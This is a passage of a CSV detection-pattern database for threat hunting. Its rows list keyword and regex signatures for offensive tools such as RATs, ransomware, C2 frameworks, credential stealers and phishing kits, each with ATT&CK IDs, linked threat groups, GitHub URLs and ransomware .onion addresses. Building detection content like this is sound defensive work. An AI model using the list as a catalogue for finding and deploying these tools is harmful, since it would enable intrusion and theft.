Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","63192" "*xaitax/TotalRecall*",".{0,1000}xaitax\/TotalRecall.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","63193" 
"*xato-net-10-million-usernames.txt*",".{0,1000}xato\-net\-10\-million\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","63195" "*X-C2-Beacon*",".{0,1000}X\-C2\-Beacon.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","63196" "*x-cod3r/Remote-administration-tools-archive*",".{0,1000}x\-cod3r\/Remote\-administration\-tools\-archive.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","63197" "*xcopy /y /d *\msquic_schannel\msquic.dll*",".{0,1000}xcopy\s\/y\s\/d\s\s.{0,1000}\\msquic_schannel\\msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","0","N/A","network exploitation 
tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","63199" "*xdp/backdoor.h*",".{0,1000}xdp\/backdoor\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","63201" "*xelroth/DEDSEC-RANSOMWARE*",".{0,1000}xelroth\/DEDSEC\-RANSOMWARE.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","63202" "*xelroth/ShadowStealer*",".{0,1000}xelroth\/ShadowStealer.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","63203" "*xeno rat client.exe*",".{0,1000}xeno\srat\sclient\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63204" "*xeno rat server.exe*",".{0,1000}xeno\srat\sserver\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63205" "*xeno%20rat%20client.exe*",".{0,1000}xeno\%20rat\%20client\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63206" "*xeno%20rat%20server.exe*",".{0,1000}xeno\%20rat\%20server\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63207" "*Xeno_manager.exe*",".{0,1000}Xeno_manager\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63208" "*XenoUpdateManager.lnk*",".{0,1000}XenoUpdateManager\.lnk.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63209" "*X-Evilginx*",".{0,1000}X\-Evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","63217" "*xforcered/CredBandit*",".{0,1000}xforcered\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","63218" "*xforcered/Detect-Hooks*",".{0,1000}xforcered\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","N/A","10","10","100","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z","63219" "*xforwardedfor.py*",".{0,1000}xforwardedfor\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","63220" "*xFreed0m/RDPassSpray*",".{0,1000}xFreed0m\/RDPassSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","63221" "*xfreerdp /v*SOCtest*AllLegitHere*",".{0,1000}xfreerdp\s\/v.{0,1000}SOCtest.{0,1000}AllLegitHere.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","63222" "*xfrm_poc*lucky0*",".{0,1000}xfrm_poc.{0,1000}lucky0.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63223" "*X-Gophish-Contact*",".{0,1000}X\-Gophish\-Contact.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","0","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","63224" "*Xiangshan@360RedTeam*",".{0,1000}Xiangshan\@360RedTeam.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#email","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","63225" "*XiaoliChan/wmiexec-Pro*",".{0,1000}XiaoliChan\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","63226" "*XiebroC2-main.zip*",".{0,1000}XiebroC2\-main\.zip.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","63227" "*XiebroC2-v*.7z*",".{0,1000}XiebroC2\-v.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","63228" "*xillwillx/tricky.lnk*",".{0,1000}xillwillx\/tricky\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","63229" "*XiphosResearch*",".{0,1000}XiphosResearch.{0,1000}","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","N/A","10","1551","585","2023-10-06T19:57:20Z","2015-03-05T11:15:07Z","63230" "*x-ishavocframework*",".{0,1000}x\-ishavocframework.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","63231" "*xjakumydulag5z65c7kd4agbxfyajpbrj6wfanj3koyhb5asq2x4e7yd.onion*",".{0,1000}xjakumydulag5z65c7kd4agbxfyajpbrj6wfanj3koyhb5asq2x4e7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63232" "*xjasonlyu/tun2socks*",".{0,1000}xjasonlyu\/tun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","63233" "*XjKVGK8ONDO9zVYwyGZBcz0pRjnm9eDj6vPpYOZqeAgr1n7aqBNgZPZolYoc=*",".{0,1000}XjKVGK8ONDO9zVYwyGZBcz0pRjnm9eDj6vPpYOZqeAgr1n7aqBNgZPZolYoc\=.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#base64","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","63234" "*xlowfznrg4wf7dli.onion*",".{0,1000}xlowfznrg4wf7dli\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63235" "*xmendez/wfuzz*",".{0,1000}xmendez\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63236" "*XML-External-Entity-(XXE)-Payloads*",".{0,1000}XML\-External\-Entity\-\(XXE\)\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","63237" "*xmr.2miners.com*",".{0,1000}xmr\.2miners\.com.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free 
Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","63238" "*xnsbsjciylsg23zfmrv6ocuyh7ha5zexeouchlr3zsi5suda4arpeyqd.onion*",".{0,1000}xnsbsjciylsg23zfmrv6ocuyh7ha5zexeouchlr3zsi5suda4arpeyqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63259" "*XOR Shellcode Encoder.csproj*",".{0,1000}XOR\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","63260" "*xor*8200ab18b1a1965f1759c891e87bc32f208843331d83195c21ee03148b531a0e*",".{0,1000}xor.{0,1000}8200ab18b1a1965f1759c891e87bc32f208843331d83195c21ee03148b531a0e.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","63261" "*xor.exe *.txt*",".{0,1000}xor\.exe\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","63262" "*xor.py *.dll*",".{0,1000}xor\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","63263" 
"*XOR_b64_encrypted*covenant.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63264" "*XOR_b64_encrypted*covenant2.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant2\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63265" "*XOR_b64_encrypted*havoc.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}havoc\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63266" "*xor_crypt_and_encode(*",".{0,1000}xor_crypt_and_encode\(.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","63267" "*xor_encrypt(*",".{0,1000}xor_encrypt\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","63268" "*xor_payload*",".{0,1000}xor_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
